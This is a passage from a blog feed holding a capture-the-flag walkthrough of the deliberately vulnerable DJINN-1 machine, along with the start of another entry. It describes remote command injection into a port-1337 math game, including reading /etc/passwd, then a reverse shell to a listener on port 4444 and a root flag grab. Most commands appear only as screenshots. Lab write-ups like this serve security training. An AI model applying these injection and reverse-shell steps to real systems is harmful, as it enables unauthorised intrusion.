left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipDOgrhzDbY-RMm6NqvC2BLDiUNqM1NXIIMIlVsaq3GXpry1LBrv9-j2UpPA_0ztSlmKIEnHqfVUmzBZew47_f8mZ-6u2KVDlKI4s9HGRPCgNUnEw0lm-g_4qt2wEcQBEteHJcn5yMYjlc/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;47&quot; data-original-width=&quot;319&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipDOgrhzDbY-RMm6NqvC2BLDiUNqM1NXIIMIlVsaq3GXpry1LBrv9-j2UpPA_0ztSlmKIEnHqfVUmzBZew47_f8mZ-6u2KVDlKI4s9HGRPCgNUnEw0lm-g_4qt2wEcQBEteHJcn5yMYjlc/s16000/screenshot.76.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Decompyling &lt;b&gt;.pyc&lt;/b&gt; we find that it actually corresponds to script &lt;b&gt;lago&lt;/b&gt;, and there is a couple of lines that give us the answer to achieve a /bin/sh shell:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ4UKqj3m8S1zohdazpCJNWKfwfja1EoB0ijoGdCxFF2zGr1jPO-JdpgDjq_62i3nmt__LDI2L-ni47hKgnQ11adkw0Dx881iSkw-bpdDM__3Qk4G0HW5wtdYxiO1vy6Z0o-veK861Oc5S/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;573&quot; data-original-width=&quot;724&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ4UKqj3m8S1zohdazpCJNWKfwfja1EoB0ijoGdCxFF2zGr1jPO-JdpgDjq_62i3nmt__LDI2L-ni47hKgnQ11adkw0Dx881iSkw-bpdDM__3Qk4G0HW5wtdYxiO1vy6Z0o-veK861Oc5S/s16000/screenshot.77.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- So entering word &lt;b&gt;num&lt;/b&gt; as answer finally we get a root shell:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm4r3EdQ-3RTIA90Wq2IxSFAwnQq9mNsvskMMGfYKGJBImrFGKv6NeJUkaE-vll4HtQH9iNXGteonzfAIQX2we7Damv0sqT0LUNMXdFPEsmv60VPPdlZ8IKEEI0WjgVVzwIO9WcU5w6aG7/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;254&quot; data-original-width=&quot;443&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm4r3EdQ-3RTIA90Wq2IxSFAwnQq9mNsvskMMGfYKGJBImrFGKv6NeJUkaE-vll4HtQH9iNXGteonzfAIQX2we7Damv0sqT0LUNMXdFPEsmv60VPPdlZ8IKEEI0WjgVVzwIO9WcU5w6aG7/s16000/screenshot.56.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;5.2 - Remote command injection&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Connecting with nc to port 1337 there is a math game:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ4ibkn2U6G82MdCg3evsWs31ZhKdjHE8IBP-JWhIEJWDSdLmHI8lW5DDg8_9YNcxVeFaB2IwwaONNimjVfNlKqxDlDKMnE-gWlFF_MCkfoZYuFR3U1B0wI3amtlloOhKIMUt0YBe1LEp_/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;484&quot; data-original-width=&quot;678&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ4ibkn2U6G82MdCg3evsWs31ZhKdjHE8IBP-JWhIEJWDSdLmHI8lW5DDg8_9YNcxVeFaB2IwwaONNimjVfNlKqxDlDKMnE-gWlFF_MCkfoZYuFR3U1B0wI3amtlloOhKIMUt0YBe1LEp_/s16000/screenshot.61.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- Trying a remote injection with command &lt;b&gt;pwd &lt;/b&gt;the result is successful:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNnckyUGwpMaAhyphenhyphen50Co_9TLTUt5rO4FzzG6Wx4RJ-6Em0ndEsG7ASeF780Lt_2OgIZiiRxZtMKi6Xf_tNXN0mLHuPEVRwcVWU62-Eu-eEWZX4rHDUgS6-02t9hOdnXqgisIXPGhugVV6SH/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;323&quot; data-original-width=&quot;675&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNnckyUGwpMaAhyphenhyphen50Co_9TLTUt5rO4FzzG6Wx4RJ-6Em0ndEsG7ASeF780Lt_2OgIZiiRxZtMKi6Xf_tNXN0mLHuPEVRwcVWU62-Eu-eEWZX4rHDUgS6-02t9hOdnXqgisIXPGhugVV6SH/s16000/screenshot.63.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Same thing with command &lt;b&gt;ls:&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO3lHosze5ZPdytGRtW2APV__r9Y4zWyGpgfl2FHgRR6zbudSJAREDEKVln-NgOYPRZkjWGHTe7qMR1A7QiuIY2GiPkZkC03lEnBG-buhtOyF0DRsCC8goy5-L6G61M0gjlWfAiTUj1NG0/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;441&quot; data-original-width=&quot;393&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO3lHosze5ZPdytGRtW2APV__r9Y4zWyGpgfl2FHgRR6zbudSJAREDEKVln-NgOYPRZkjWGHTe7qMR1A7QiuIY2GiPkZkC03lEnBG-buhtOyF0DRsCC8goy5-L6G61M0gjlWfAiTUj1NG0/s16000/screenshot.64.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Same thing with command &lt;b&gt;cat /etc/passwd&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtb4bK611zLPck7TzOMVN6_Hk6HcHSPW4ilTq80qk58IAgyiU6x0LohPHt3FwCEwZJVFYpGmBcsSeuSOnhhlMJoSdGpcNRg1eVhvhnLnVicIHbps-r6yCbnDp_dIDDo_5vTm6CxjnDCNWR/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;414&quot; data-original-width=&quot;724&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtb4bK611zLPck7TzOMVN6_Hk6HcHSPW4ilTq80qk58IAgyiU6x0LohPHt3FwCEwZJVFYpGmBcsSeuSOnhhlMJoSdGpcNRg1eVhvhnLnVicIHbps-r6yCbnDp_dIDDo_5vTm6CxjnDCNWR/s16000/screenshot.65.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Setting a listening session at port 4444:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8bfuA6EVfgtai0s0lMAlrGJWDlhySSFZlp17wr1OL1vWO1NXBDf9Inw_pUl47ndVLnANJ47LbggbKPjsndCN3EUc1oh8wjMt04JGmDwcXp7h9GpXZWIFBzk1bcKc2yPcQjZ7MtsX9BUu1/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;69&quot; data-original-width=&quot;314&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8bfuA6EVfgtai0s0lMAlrGJWDlhySSFZlp17wr1OL1vWO1NXBDf9Inw_pUl47ndVLnANJ47LbggbKPjsndCN3EUc1oh8wjMt04JGmDwcXp7h9GpXZWIFBzk1bcKc2yPcQjZ7MtsX9BUu1/s16000/screenshot.66.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- Injecting&amp;nbsp; this remote command:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet&quot;&gt;https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcm3tN2fPLyYqtBvI8IY93YXG2zehXQsm23B-vyCTqnGi3c_Wceup81f46gXYM6qorUDZECyTRNoZWNoF_aHgObeZh7t4pfOK0-hjFEZ6Ox0cJYxlK-9aZBC_b9IF76Ft6HbWsntr18Wcw/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;244&quot; data-original-width=&quot;716&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcm3tN2fPLyYqtBvI8IY93YXG2zehXQsm23B-vyCTqnGi3c_Wceup81f46gXYM6qorUDZECyTRNoZWNoF_aHgObeZh7t4pfOK0-hjFEZ6Ox0cJYxlK-9aZBC_b9IF76Ft6HbWsntr18Wcw/s16000/screenshot.79.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_LP5aIRWuCb2GoQHkr94X2aYLsUrE5jPlBiKZwCqExmUpPK73FvfBwvS-8Kh8JlIUaPpr0eKV0n1JCkIuLwIUUr3zKExoHwT1z2lNxgUdrpoNG1RtPEKgV9y6uQ857Ts0ug4A-uu4XNf2/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;327&quot; data-original-width=&quot;1218&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_LP5aIRWuCb2GoQHkr94X2aYLsUrE5jPlBiKZwCqExmUpPK73FvfBwvS-8Kh8JlIUaPpr0eKV0n1JCkIuLwIUUr3zKExoHwT1z2lNxgUdrpoNG1RtPEKgV9y6uQ857Ts0ug4A-uu4XNf2/s16000/screenshot.68.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- Finally, a reverse shell is back at Kali:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiutKzOyPB29jOL9bb5HAbbghQ05eITigL7q8WO1VT2stVjwvATvdQuBJnBpo_cmkpZj0HRN2aIt8ocNIqUj__5roU0veSfWMZDb8E0uGsAc43iaSW4wnlTny_j_1rqarKUcx45ocYXDif/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;162&quot; data-original-width=&quot;686&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiutKzOyPB29jOL9bb5HAbbghQ05eITigL7q8WO1VT2stVjwvATvdQuBJnBpo_cmkpZj0HRN2aIt8ocNIqUj__5roU0veSfWMZDb8E0uGsAc43iaSW4wnlTny_j_1rqarKUcx45ocYXDif/s16000/screenshot.67.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;6 - CAPTURING THE 2nd FLAG&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Going to &lt;b&gt;root&lt;/b&gt; folder:&lt;b&gt;&lt;/b&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5GiwZTaX9la8ECeQWwFpzWGbkX4lb_J8VaNX65WFMuLs_RYWMoguyctCXZfEfkqKes7nZqHZ0-BhfESEOJCk3NVUnsD0CVpYcfDLggBq9WDi9hTKxaqRi_E5XTTewaCt14HN8YBQMRg-t/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;303&quot; data-original-width=&quot;629&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5GiwZTaX9la8ECeQWwFpzWGbkX4lb_J8VaNX65WFMuLs_RYWMoguyctCXZfEfkqKes7nZqHZ0-BhfESEOJCk3NVUnsD0CVpYcfDLggBq9WDi9hTKxaqRi_E5XTTewaCt14HN8YBQMRg-t/s16000/screenshot.60.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading&lt;b&gt; proof.sh&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtDk96cfNWgZyxEYCY7D8dG9hV4Z5_fOvPkxq15hu3MLtfdFVUiUV9gEKzDcQp2Ipw5C-UPdXBC39cu5sV2ceKxRoc9F4HMWPbujS-EpY7IauVcX_VqeCPoppgTMeEThd6IZJIs1kffvdE/&quot; style=&quot;clear: left; display: inline; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;752&quot; data-original-width=&quot;808&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtDk96cfNWgZyxEYCY7D8dG9hV4Z5_fOvPkxq15hu3MLtfdFVUiUV9gEKzDcQp2Ipw5C-UPdXBC39cu5sV2ceKxRoc9F4HMWPbujS-EpY7IauVcX_VqeCPoppgTMeEThd6IZJIs1kffvdE/s16000/screenshot.57.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Executing &lt;b&gt;proof.sh&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSWLYFv39l7dlw42SxslJoDeqkU_d8pT4hF2FRIQd9lTcjorW_09JuSbsjm1WcJfXNFkj0zA5qd7Xf3Su9jW4CgDU1b-Za5zGgpc_EO6efIr7YW7e8mtK-rde5zcnUhnQOrd9mXddOO8mv/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;28&quot; data-original-width=&quot;151&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSWLYFv39l7dlw42SxslJoDeqkU_d8pT4hF2FRIQd9lTcjorW_09JuSbsjm1WcJfXNFkj0zA5qd7Xf3Su9jW4CgDU1b-Za5zGgpc_EO6efIr7YW7e8mtK-rde5zcnUhnQOrd9mXddOO8mv/s16000/screenshot.58.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrsdc4eisNSumdVwa_rcLOLDALaJ2IjB0R_huPceuLWFDkI8e26qIamg-FAM-QGSy-NQo2NhZuhizRmAFjMD4xbJtpK3VT-yp-safVmnPB-0OlbRGQe6PJn5SISBGrb8oBlyeFSJZ_oALF/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;414&quot; data-original-width=&quot;748&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrsdc4eisNSumdVwa_rcLOLDALaJ2IjB0R_huPceuLWFDkI8e26qIamg-FAM-QGSy-NQo2NhZuhizRmAFjMD4xbJtpK3VT-yp-safVmnPB-0OlbRGQe6PJn5SISBGrb8oBlyeFSJZ_oALF/s16000/screenshot.59.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/4429076541474002376'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/4429076541474002376'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2021/11/djinn-1.html' title='DJINN-1'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk0zZB9ARJD00Hifk44vf4XtSXNEDML9C5pRY8zfGdvbOo5bc0UehKqRZdffXPzRblkaoD93ruQ35z5Gy1iVHaEJqreLKgezwi8HtvDjgeXGQRLgVgtXYVcyuww0K1Bz754drcUN2DncZG/s72-c/screenshot.78.jpg" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-455222361896924339</id><published>2021-11-07T10:52:00.423-06:00</published><updated>2021-12-13T12:52:56.475-06:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>SAR-1</title><content type='html'>&lt;p&gt;&lt;span style=&quot;color: 